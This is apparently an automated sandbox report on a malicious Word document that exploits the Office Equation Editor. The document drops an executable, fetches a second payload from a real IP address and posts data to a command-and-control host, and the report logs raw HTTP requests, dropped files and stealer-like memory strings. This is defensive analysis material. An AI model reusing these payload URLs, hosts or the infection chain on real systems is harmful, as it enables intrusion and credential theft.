    Source: Joe Sandbox ViewASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
    Source: global trafficHTTP traffic detected: GET /3/Sugvt.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.210.20.6Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: unknownTCP traffic detected without corresponding DNS query: 198.98.60.43
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_00421CF0 InternetSetFilePointer,InternetReadFile,_memset,HttpQueryInfoA,CoCreateInstance,_memcpy_s,_memcpy_s,
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4C77723-97C0-4A14-814E-1968BCE52029}.tmpJump to behavior
    Source: global trafficHTTP traffic detected: GET /3/Sugvt.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.210.20.6Connection: Keep-Alive
    Source: toqqx.exe, 0000000B.00000003.2255586151.0000000000841000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
    Source: toqqx.exe, 0000000B.00000003.2255586151.0000000000841000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: unknownHTTP traffic detected: POST /6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 198.98.60.43Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp, toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0A
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp, toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0H
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0I
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0N
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.thawte.com0
    Source: toqqx.exe, 00000004.00000002.2240187063.0000000005B30000.00000002.00000001.sdmp, toqqx.exe, 00000008.00000002.2255199061.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
    Source: toqqx.exe, 00000004.00000002.2240187063.0000000005B30000.00000002.00000001.sdmp, toqqx.exe, 00000008.00000002.2255199061.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
    Source: toqqx.exe, 0000000B.00000003.2241406880.0000000000990000.00000004.00000001.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpString found in binary or memory: http://www.mozilla.com0
    Source: toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: toqqx.exeString found in binary or memory: https://discord.com/
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000002.2250455395.0000000000489000.00000004.00000020.sdmp, toqqx.exe, 0000000B.00000000.2231082620.000000000105A000.00000002.00020000.sdmpString found in binary or memory: https://discord.com/2
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000002.2250455395.0000000000489000.00000004.00000020.sdmp, toqqx.exe, 0000000B.00000000.2231082620.000000000105A000.00000002.00020000.sdmpString found in binary or memory: https://discord.com/6
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000002.2250455395.0000000000489000.00000004.00000020.sdmp, toqqx.exe, 0000000B.00000000.2231082620.000000000105A000.00000002.00020000.sdmpString found in binary or memory: https://discord.com/:
    Source: toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
    Source: toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp, toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: toqqx.exe, 0000000B.00000003.2255569362.0000000000898000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/favicon.ico
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASS
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASS
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASS

    System Summary:

    barindex
    Office equation editor drops PE fileShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\toqqx.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Sugvt[1].exeJump to dropped file
    Source: C:\Users\user\toqqx.exeMemory allocated: 76E20000 page execute and read and write
    Source: C:\Users\user\toqqx.exeMemory allocated: 76D20000 page execute and read and write
    Source: C:\Users\user\toqqx.exeMemory allocated: 76E20000 page execute and read and write
    Source: C:\Users\user\toqqx.exeMemory allocated: 76D20000 page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeMemory allocated: 76E20000 page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeMemory allocated: 76D20000 page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeMemory allocated: 76E20000 page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeMemory allocated: 76D20000 page execute and read and write
    Source: C:\Users\user\toqqx.exeCode function: 4_2_00357050
    Source: C:\Users\user\toqqx.exeCode function: 4_2_0035A2F0
    Source: C:\Users\user\toqqx.exeCode function: 4_2_00358BAE
    Source: C:\Users\user\toqqx.exeCode function: 4_2_00350C9C
    Source: C:\Users\user\toqqx.exeCode function: 4_2_0035D518
    Source: C:\Users\user\toqqx.exeCode function: 4_2_00351D78
    Source: C:\Users\user\toqqx.exeCode function: 4_2_003555E0
    Source: C:\Users\user\toqqx.exeCode function: 4_2_00355EB0
    Source: C:\Users\user\toqqx.exeCode function: 4_2_00359F50
    Source: C:\Users\user\toqqx.exeCode function: 4_2_003507C8
    Source: C:\Users\user\toqqx.exeCode function: 4_2_0035A03C
    Source: C:\Users\user\toqqx.exeCode function: 4_2_0035C038
    Source: C:\Users\user\toqqx.exeCode function: 4_2_0035112B
    Source: C:\Users\user\toqqx.exeCode function: 4_2_00355298
    Source: C:\Users\user\toqqx.exeCode function: 4_2_00356DE8
    Source: C:\Users\user\toqqx.exeCode function: 4_2_00351E2A
    Source: C:\Users\user\toqqx.exeCode function: 8_2_003B7050
    Source: C:\Users\user\toqqx.exeCode function: 8_2_003BA2F0
    Source: C:\Users\user\toqqx.exeCode function: 8_2_003B8BAE
    Source: C:\Users\user\toqqx.exeCode function: 8_2_003B0CA0
    Source: C:\Users\user\toqqx.exeCode function: 8_2_003BD518
    Source: C:\Users\user\toqqx.exeCode function: 8_2_003B1D78
    Source: C:\Users\user\toqqx.exeCode function: 8_2_003B55E0
    Source: C:\Users\user\toqqx.exeCode function: 8_2_003B5EB0
    Source: C:\Users\user\toqqx.exeCode function: 8_2_003B9F50
    Source: C:\Users\user\toqqx.exeCode function: 8_2_003B07C8
    Source: C:\Users\user\toqqx.exeCode function: 8_2_003BC038
    Source: C:\Users\user\toqqx.exeCode function: 8_2_003BA03C
    Source: C:\Users\user\toqqx.exeCode function: 8_2_003BC02A
    Source: C:\Users\user\toqqx.exeCode function: 8_2_003B112B
    Source: C:\Users\user\toqqx.exeCode function: 8_2_003B5298
    Source: C:\Users\user\toqqx.exeCode function: 8_2_003B6DE8
    Source: C:\Users\user\toqqx.exeCode function: 8_2_003B1E2A
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_00413480
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_00413C90
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_00413060
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_00413AA0
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_00404B10
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_00413060
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_00413AA0
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_00404B10
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_00413480
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 13_2_00413C90
    Source: PL_503_13_570.docxOLE indicator has summary info: false
    Source: PL_503_13_570.docxOLE indicator application name: unknown
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: String function: 0040B166 appears 46 times
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: String function: 00408C20 appears 82 times
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: String function: 00422F70 appears 782 times
    Source: sqlite3.dll.11.drStatic PE information: Number of sections : 19 > 10
    Source: Sugvt[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: toqqx.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: notpad.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: toqqx.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: notpad.exe.8.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOCX@18/32@0/2
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeCode function: 11_2_00421CF0 InternetSetFilePointer,InternetReadFile,_memset,HttpQueryInfoA,CoCreateInstance,_memcpy_s,_memcpy_s,
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$_503_13_570.docxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC0DE.tmpJump to behavior
    Source: PL_503_13_570.docxOLE document summary: title field not present or empty
    Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................x.......(.P.....D.................................................'.....................Z.........B.......B.....
    Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ......................B.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........04^.......4.t...........0...............x.'.....&.................B.....
    Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................................................_Bas.......................s......'.....................X.................B.....
    Source: C:\Windows\SysWOW64\taskkill.exeConsole Write: ..................-..............3E.....(.P.....D...............(.........................................................................-.....
    Source: C:\Users\user\toqqx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
    Source: C:\Users\user\toqqx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 2540)
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\toqqx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
    Source: toqqx.exe, 0000000B.00000003.2236787988.0000000002BC0000.00000004.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
    Source: toqqx.exe, 0000000B.00000003.2236787988.0000000002BC0000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
    Source: toqqx.exe, 0000000B.00000003.2236787988.0000000002BC0000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
    Source: toqqx.exe, 0000000B.00000003.2236787988.0000000002BC0000.00000004.00000001.sdmpBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpBinary or memory string: SELECT ALL id FROM %s;
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpBinary or memory string: SELECT ALL id FROM %s WHERE %s;
    Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
    Source: toqqx.exe, 0000000B.00000003.2248959479.0000000002FE0000.00000004.00000001.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
